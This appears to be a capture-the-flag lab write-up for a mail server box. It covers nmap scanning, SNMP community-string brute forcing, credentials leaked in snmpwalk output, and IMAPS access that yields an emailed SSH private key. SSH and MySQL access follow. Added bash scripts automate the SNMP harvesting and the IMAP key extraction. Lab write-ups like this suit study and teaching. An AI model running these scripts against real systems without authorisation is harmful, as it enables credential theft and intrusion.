First, add the target IP, 10.129.202.20, to ~/.zshrc and source it (exporting it so child processes and scripts see it as well):
echo 'export IP=10.129.202.20' >> ~/.zshrc && source ~/.zshrc
That gives me the $IP variable in any shell I open. Next I run an nmap scan of the server with default scripts and version detection:
nmap $IP -sC -sV -oA nmap_scan
The -oA flag writes the results in all three output formats (normal, grepable and XML), so I can review them later and keep a detailed copy. ![[01-addIP.png]] ![[02-Namp scan.png]]
nmap returned five open TCP ports on the mail server: 22 (SSH), 110 (POP3), 143 (IMAP), 993 (IMAPS) and 995 (POP3S).
Using openssl [[Commands Used#^3|3]] I could connect to the IMAPS service, but without credentials I could not get past the login. Not sure where to go next, I looked online and saw the server also runs SNMP (UDP port 161), which I verified with an nmap UDP scan. [[Commands Used#^4|4]] ![[03-openssl_attempt.png]] ![[04-nmap_Udp.png]]

With two new ports found, this might be another way in. I used onesixtyone [[Commands Used#^5|5]] to brute-force community strings, and it found "backup". ![[05-onesixtyone.png]]

With a community string in hand, I ran snmpwalk and teed the results to a text file [[Commands Used#^6|6]] for later review. Near the end of the output there is some interesting information for the user tom. ![[06-snmpwalk_results.png]]

Now having a username and password, I tried them with the openssl command [[Commands Used#^3|3]] and logged in. ![[07-openssl_login.png]]
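The SNMP steps above as one scripted pipeline: brute-force the community string with onesixtyone, walk the tree with the string that answers while keeping a copy on disk, and filter the walk down to its STRING values, which is where process command lines (hrSWRunParameters) and contact fields tend to leak credentials. This is an added example, not the write-up's own commands; it assumes $IP is set as above and a community wordlist at the SecLists path below (path is an assumption, adjust to your install).

```shell
#!/usr/bin/env bash
# Added example: SNMP community brute force + walk + string filter.
# Assumes $IP from ~/.zshrc and a community wordlist at $WORDLIST (assumed path).
WORDLIST="${WORDLIST:-/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt}"

find_community() {
  # onesixtyone prints "host [community] sysDescr" for each string the agent
  # answers to; pull the community out of the brackets and keep the first hit.
  onesixtyone -c "$WORDLIST" "$1" | sed -n 's/^[^[]*\[\([^]]*\)\].*/\1/p' | head -n 1
}

walk_snmp() {
  # Walk the whole tree with the recovered community and tee it to a file,
  # so the (often long) output can be reviewed again later without re-walking.
  local host="$1" community="$2" out="${3:-snmpwalk_${community}.txt}"
  snmpwalk -v2c -c "$community" "$host" | tee "$out"
}

snmp_strings() {
  # Reduce a walk (file or stdin) to the bare STRING values: strip the OID,
  # the "= STRING:" marker and the surrounding quotes, drop empty values.
  grep -E '= STRING:' | sed -E 's/^[^=]*= STRING: "?//; s/"$//' | grep -v '^$'
}

# Usage; only runs when $IP is set, so the functions can be sourced safely.
if [ -n "${IP:-}" ]; then
  community=$(find_community "$IP")
  [ -n "$community" ] && walk_snmp "$IP" "$community" | snmp_strings
fi
```

Reading the filtered strings rather than the raw walk is what makes a username and password in a process argument list stand out; grep the saved walk file for the OID of any interesting line to see its full context.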
I start by listing the mailboxes on the server and open INBOX first. It holds one email, and reading it shows an OpenSSH private key, which I copy and save for later. The other mailboxes are empty. ![[08-Imap-SSH.png]] With Tom's private key saved, I fix the file permissions [[Commands Used#^7|7]] so ssh will accept it, then use it to log in. [[Commands Used#^8|8]] ![[09-SSH.png]]
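The IMAP exchange from the two paragraphs above, scripted end to end: log in over IMAPS with openssl s_client, list the mailboxes, fetch the single message in INBOX, carve the OpenSSH private key out of it and use it with ssh. This is an added example rather than the write-up's own commands; it assumes $IP from ~/.zshrc, the user tom, and the password recovered from the SNMP walk in $IMAP_PASS (a placeholder variable).

```shell
#!/usr/bin/env bash
# Added example: drive IMAPS with openssl s_client and recover the mailed key.
# Assumes $IP (target), user tom and $IMAP_PASS (password from snmpwalk).

imap_script() {
  # Tagged IMAP commands, CRLF-terminated as the protocol requires. Quoting
  # the credentials keeps spaces or special characters from breaking LOGIN.
  local user="$1" pass="$2"
  printf 'a1 LOGIN "%s" "%s"\r\n' "$user" "$pass"
  printf 'a2 LIST "" "*"\r\n'        # enumerate every mailbox
  printf 'a3 SELECT INBOX\r\n'       # open INBOX (1 message on this box)
  printf 'a4 FETCH 1 BODY[]\r\n'     # pull the full raw message
  printf 'a5 LOGOUT\r\n'             # server answers BYE and closes
}

imap_dump() {
  # Port 993 is IMAP over TLS, so plain nc will not do; openssl s_client wraps
  # the session. -quiet drops the certificate chatter and keeps the socket open
  # after stdin closes; the sleep gives the server time before LOGOUT ends it.
  local host="$1" user="$2" pass="$3"
  { imap_script "$user" "$pass"; sleep 3; } | openssl s_client -quiet -connect "$host:993" 2>/dev/null
}

extract_key() {
  # Carve the PEM block out of the fetched mail. IMAP lines end in CRLF and
  # ssh wants LF only, so strip the carriage returns first.
  tr -d '\r' | sed -n '/^-----BEGIN OPENSSH PRIVATE KEY-----$/,/^-----END OPENSSH PRIVATE KEY-----$/p'
}

# Usage; only runs when both variables are set, so the file can be sourced.
if [ -n "${IP:-}" ] && [ -n "${IMAP_PASS:-}" ]; then
  imap_dump "$IP" tom "$IMAP_PASS" | tee imap_dump.txt | extract_key > tom.key
  chmod 600 tom.key            # ssh refuses a key readable by other users
  ssh -i tom.key "tom@$IP"
fi
```

The raw session is kept in imap_dump.txt so the LIST and SELECT responses (mailbox names, message count) can be checked if the key does not appear; the chmod is the step the write-up refers to, since ssh rejects private keys with permissions wider than 0600.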
Once on the box over SSH, I check what sudo rights Tom has [[Commands Used#^9|9]], but there are none. Next I list the files in Tom's home directory [[Commands Used#^10|10]]. The one that stands out is .mysql_history, so I read through it. [[Commands Used#^11|11]] ![[10-SSH_tom_homedir.png]]
I log in to MySQL with the password found earlier [[Commands Used#^12|12]] and list the databases. From there I select the users table and look at its columns [[Commands Used#^13|13]], which makes finding the target row easier. Finally I search for the user 'htb'. [[Commands Used#^14|14]] ![[11-mysql_login.png]] ![[12-mysql_columns.png]] ![[13-mysql_htb_users.png]]